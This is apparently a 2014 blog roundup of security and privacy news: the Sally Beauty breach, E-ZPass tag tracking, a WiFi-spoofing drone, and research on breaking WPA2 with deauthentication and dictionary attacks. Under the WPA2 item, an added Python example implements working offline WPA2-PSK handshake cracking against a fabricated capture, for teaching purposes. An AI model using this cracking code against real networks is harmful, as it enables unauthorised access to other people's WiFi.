Tuesday, March 25, 2014
Very interesting graphic of the military downsizing after the fall of the Soviet Union. Let's hope all those nukes went back to Russia or were dismantled.
Ukraine Battles to Rebuild a Depleted Military
As the Kremlin began its invasion of the Ukrainian peninsula of Crimea last month, a days-old government in Kiev turned to its military to stem the tide. There was an immediate problem: No car batteries for the military vehicles.
With coffers empty, Ukraine's fledgling government appealed to the U.S. embassy for help. The embassy said it would take weeks to get assistance, so the government had to search—among its own people—to find a regional oligarch, Ihor Kolomoisky, to kick in the funds to buy them locally.
I am coming to the conclusion that it IS smart to deliberately understate the size of a breach in the early releases of information. Apparently, when you get around to correcting (admitting) the numbers, no one in the media truly cares.
ZIP Codes Show Extent of Sally Beauty Breach
Earlier this month, beauty products chain Sally Beauty acknowledged that a hacker break-in compromised fewer than 25,000 customer credit and debit cards. My previous reporting indicated that the true size of the breach was at least ten times larger. The analysis published in this post suggests that the Sally Beauty breach may have impacted virtually all 2,600+ Sally Beauty locations nationwide.
… I asked Sally Beauty to comment on my findings. They declined again to offer any more detail on the breach, issuing the following statement:
“As experience has shown in prior data security incidents at other companies, it is difficult to ascertain with certainty the scope of a data security incident prior to the completion of a comprehensive forensic investigation. As a result, we will not speculate as to the scope or nature of the data security incident. Please check sallybeautyholdings.com for updates.”
[Note that they do not say that they haven't already completed their investigation. Bob]
The zip code analysis is available in this .csv spreadsheet.
I ask you, how would Christie know when to close lanes onto the bridge without this?
I’m driving around Bergen County. That sound you’re hearing is a device that alerts you any time your E-ZPass tag is scanned. The problem is that it’s going off like crazy and there isn’t a toll booth in sight. The device was created by a man who is protective of his privacy, but still wanted an alias that makes a splash. His cover name is Puking Monkey. Our ride takes us on the feeder roads surrounding the George Washington Bridge including Routes 46 and 4 in Fort Lee and up the northbound side of the Palisades Parkway and all the while this detector keeps going off, even though during that entire time, we didn’t go near a single toll booth.
Read more on WBGO.
It's simple. Just put FBI “Stingray” technology in a drone. Why didn't the FBI think of that. (Of course they did)
… London-based Sensepoint security researchers have developed a drone called 'Snoopy' that can intercept data from your Smartphones using spoofed wireless networks, CNN Money reported.
The Drone will search for WiFi enabled devices and then using its built-in technology, it will see what networks the phones have accessed in the past and pretends to be one of those old network connections.
Spoofing WiFi networks that the device has already accessed allows Snoopy Drone to connect with targeted Smartphone without authentication or interaction. In technical terms, The Drone will use 'Wireless Evil Twin Attack' to hack Smartphones.
Perhaps I see this differently. It is easy to ignore communication that does not originate or terminate at specific locations, or involve specific individuals (or countries). All you need is the guts to face the possibility that the next terrorist act would have been easily prevented if you had been monitoring that communications link.
The New York Times report that President Obama will call for an end to the bulk collection of American’s telephone metadata is yet further vindication for Edward Snowden in particular, and for transparency more generally. The only reason the President is proposing this change is because, once the program became public, it was unsustainable in its current form.
(Related) Will we lose this ability?
Ellen Nakashima reports:
Federal agents notified more than 3,000 U.S. companies last year that their computer systems had been hacked, White House officials have told industry executives, marking the first time the government has revealed how often it tipped off the private sector to cyberintrusions.
The alerts went to firms large and small, from local banks to major defense contractors to national retailers such as Target, which suffered a breach last fall that led to the theft of tens of millions of Americans’ credit card and personal data, according to government and industry officials.
Read more on the Washington Post.
It would be nice to know how many of those 3,000 cases involved breaches of personal information databases as opposed to trade secrets or intellectual property, but it’s good that the government is sharing what it has learned with targeted entities.
[From the article:
The number reflects only a fraction of the true scale of cyberintrusions into the private sector by criminal groups and foreign governments and their proxies, particularly in China and Eastern Europe.
While some companies are encouraging BYOD, others are requiring employees to stop any personal use of their equipment. (My wife tells me I must buy her a cellphone and a computer.)
UK – Bring your own device (BYOD)
by Sabrina I. Pacifici on March 24, 2014
Bring your own device guidance: “Bring your own device is a term which refers to when employees use their personal computing devices (typically smart phones and tablets) in the workplace. Permitting devices which you do not have sufficient control over to connect to the corporate IT systems can introduce a range of security vulnerabilities and other data protection concerns if not correctly managed. This guidance explores what you need to consider if permitting the use of personal devices to process personal data for which you are responsible.”
My favorite scofflaw. (He's hardly a “fugitive” unless that means something different in New Zealandese) Think I might buy a few shares...
Cyber fugitive Dotcom mocks authorities: 'From 0 into a $210m company'
Kim Dotcom, one of the world's most wanted cyber fugitives, on Tuesday gloated over a deal that will see a cloud storage firm he founded while on bail listing on the New Zealand stock exchange and valued on paper at NZ$210 million ($179 million).
The flashy internet mogul, who also goes by the name Kim Schmitz, is fighting a bid by U.S. authorities to extradite him from his lavish estate in New Zealand to face online piracy charges over the now closed file sharing site Megaupload.
… New Zealand company records show Mega Ltd's shareholders include Dotcom's wife, through a trust, with a 26 percent stake. Dotcom is not listed as a shareholder nor a director, but on the Mega website he is called principal strategist.
(Related) Why are New Zealand and Australia overreacting so easily?
Doubts over computer hacker case
Matthew Flannery, 24, of Point Clare, was allegedly an international hacking group leader when he was arrested while at work at a Sydney IT security firm last April and charged with computer crime offences carrying jail terms of up to 10 years.
But in Woy Woy Local Court this month magistrate Derek Lee was told Mr Flannery expected to apply in May to have all charges against him withdrawn and dismissed.
The application will come after the Commonwealth Office of the Director of Public Prosecutions over the past year has downgraded the case from the District Court to the Local Court, modified the charges, sought six adjournments and agreed to vary Mr Flannery’s bail so that he was not required to report to police three times a week.
For my students to get the most out of their technology training...
Tech Videos — Best Of The Best YouTube Technology Channels
New technology, be it gadgets, computers or broader innovations, can be difficult to understand. Fortunately, there are a number of YouTube channels that help you get a grasp on the latest and greatest. These sources provide news, reviews and in-depth looks at what's shaping the future. Here are ten must-watch channels every geek should subscribe to.
For my Computer Security (and Ethical Hacking) students. What's better than a Free WiFi site? A “Make Any WiFi Site Free” tool!
Researchers Outline How to Crack WPA2 Security
Published in the International Journal of Information and Computer Security, the research outlines how the Wi-Fi Protected Access 2 (WPA2) protocol can be potentially exposed using deauthentication and brute force attacks.
"Thus far, WPA2 is considered to be amongst the most secure protocols," according to the researchers' paper. "However it has several security vulnerabilities. Until now there has not been a complete and fully successful methodology capable of exposing the WPA2 security. This paper provides a novel way of successfully exposing WPA2 security issues by using a complete dictionary that generates all the possible printable ASCII characters of all possible lengths."
… "At the beginning, the area was scanned-sniffed with ‘Airodump’ and then a deauthentication attack was made with ‘Aireplay’," according to the paper. "Through that, an instance of the PSK was caught. Finally, ‘Aircrack’ was attempting to reveal the secret password by using the instance of the PSK and matching it with every record of the dictionary. For these experiments we used a very big [Please! This would fit easily on a small thumb drive. Bob] dictionary that consisted of 666,696 standard printable ASCII character records of various lengths. ‘Airodump’ and ‘Aireplay’ are commands of the ‘Aircrack’ suite, responsible for sniffing and deauthentication respectively." [Aircrack is a free wifi network Auditing tool. Bob]
In all but one of the cases, the key was easily found, the researchers stated.
… The best way to protect an 802.11i network is through the use of WPA2 in combination with MAC filtering, the researchers recommend. In addition, changing the encryption key periodically can increase the level of difficulty for attackers. The more complex the password, the more the difficulty will rise as well.
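To make concrete what the paper's Aircrack run is actually doing once a handshake has been forced and sniffed, here is an added Python example (mine, not the paper's code and not Aircrack's) that fabricates a WPA2-PSK four-way handshake for a constructed network and then runs a wordlist against its MIC, exactly the offline check a PSK cracker performs. The SSID, MAC addresses, nonces, EAPOL bytes and wordlist are all made up for the example; the key-derivation steps (PBKDF2 to the PMK, PRF-512 to the PTK, HMAC-SHA1 MIC over the EAPOL frame) are the ones 802.11i specifies for WPA2-PSK.

```python
import hashlib
import hmac
from typing import Optional

# Everything below is constructed for this example: hypothetical SSID, MAC
# addresses, nonces and EAPOL bytes. None of it comes from a real capture.
SSID = b"example-net"
AP_MAC = bytes.fromhex("001122334455")   # authenticator (AP) address
STA_MAC = bytes.fromhex("66778899aabb")  # supplicant (client) address
ANONCE = bytes(range(32))                # AP nonce sent in message 1
SNONCE = bytes(range(32, 64))            # client nonce sent in message 2
# Stand-in for the EAPOL-Key message 2 frame with its MIC field zeroed, which
# is what the MIC is computed over. Only the bytes matter here, not the layout.
EAPOL_M2_ZERO_MIC = (b"\x02\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8
                     + SNONCE + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00")


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This is the only expensive step: a wordlist attack costs one PBKDF2 per
    guess, and nothing else in the chain depends on a secret.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", sorted MACs || sorted nonces).

    Every input except the PMK is visible in cleartext in the captured handshake.
    """
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(ptk: bytes, eapol_frame_zero_mic: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 keyed with the KCK, 16 bytes."""
    kck = ptk[:16]  # first 128 bits of the PTK are the Key Confirmation Key
    return hmac.new(kck, eapol_frame_zero_mic, hashlib.sha1).digest()[:16]


def fake_capture(passphrase: str) -> dict:
    """Fabricate what a sniffer would record for a network using `passphrase`."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "ap_mac": AP_MAC, "sta_mac": STA_MAC,
            "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_M2_ZERO_MIC, "mic": eapol_mic(ptk, EAPOL_M2_ZERO_MIC)}


def crack_passphrase(capture: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack: recompute the MIC for each candidate and compare."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue  # outside the WPA passphrase length range, cannot be the PSK
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk, capture["eapol"]), capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    capture = fake_capture("letmein1")  # the constructed network's passphrase
    wordlist = ["password", "12345678", "letmein1", "qwertyui"]
    print("recovered:", crack_passphrase(capture, wordlist))  # letmein1
```

Two things the example makes visible. First, once the deauthentication-forced handshake has been captured, every remaining step is offline: the only secret in the chain is the passphrase, and the cost per guess is one PBKDF2 of 4096 HMAC-SHA1 rounds, which is why a 666,696-entry list is no obstacle at all. Second, the client and AP MAC addresses are cleartext inputs to the key derivation, so MAC filtering does nothing against this attack; of the recommendations above, only passphrase length and unpredictability raise the attacker's cost, and rotating the key merely limits how long a cracked passphrase stays useful.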
Apparently there is a market (audience) for anything.
Watch Jerry Seinfeld’s Web Series: Comedians In Cars Getting Coffee [Stuff to Watch]
American comedian Jerry Seinfeld is probably best known for the sitcom that shares his surname, but his latest venture takes the form of a free online web series. Titled Comedians In Cars Getting Coffee, the show involves Jerry Seinfeld driving famous comedians around in classic sports cars, before stopping for a cup of coffee.
The brilliance lies in the simplicity of the format which not only celebrates comedy, but classic cars and the ability to talk at length about virtually nothing at all. The show is now in its third season, with a total of 23 episodes online for your perusal.